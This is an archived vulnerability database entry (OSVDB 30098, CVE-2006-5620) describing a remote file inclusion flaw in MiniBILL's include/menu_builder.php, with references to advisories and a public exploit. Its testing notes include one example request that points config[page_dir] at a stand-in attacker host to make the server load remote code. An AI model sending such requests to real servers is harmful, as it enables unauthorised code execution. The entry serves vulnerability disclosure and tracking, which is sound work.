MiniBILL include/menu_builder.php config[page_dir] Variable Remote File Inclusion

2006-10-27T07:18:55
ID OSVDB:30098
Type osvdb
Reporter OSVDB
Modified 2006-10-27T07:18:55

Description

Manual Testing Notes

http://[target]/[script_path]/include/menu_builder.php?config[page_dir]=http://evil_script?

References:

Vendor URL: http://www.ultrize.com/minibill/index.php Secunia Advisory ID:22632 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0432.html ISS X-Force ID: 29834 Generic Exploit URL: http://www.milw0rm.com/exploits/2656 FrSIRT Advisory: ADV-2006-4249 CVE-2006-5620 Bugtraq ID: 20766